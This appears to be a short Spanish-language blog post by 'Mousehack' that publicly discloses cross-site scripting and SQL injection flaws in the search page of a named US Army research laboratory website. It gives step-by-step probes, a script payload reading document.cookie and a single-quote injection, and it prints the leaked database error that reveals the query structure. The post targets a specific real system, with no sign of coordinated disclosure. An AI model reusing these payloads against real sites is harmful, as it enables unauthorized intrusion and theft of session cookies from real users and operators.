usaarl.army.mil/ XSS y Sql Injection???
XSS:
ingresamos en en el sitio:
http://www.usaarl.army.mil/search.asp
y tipeamos: <> alert (document.cookie) < / script > y damos a la opcion ¨search¨
Sql injection (errores):
al igual que el procedimiento anterior, tipeamos ¨ ' ¨ (sin las comillas) y click en ¨search¨, obtenemos una pagina de error con el siguiente detalle:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'trtitle LIKE '%'%' ORDER BY trindex'.
/SearchResults.ASP, line 66
Salu2
publicado por Mousehack a las 2:14 p. m.
0 Comments:
Publicar un comentario
<< Home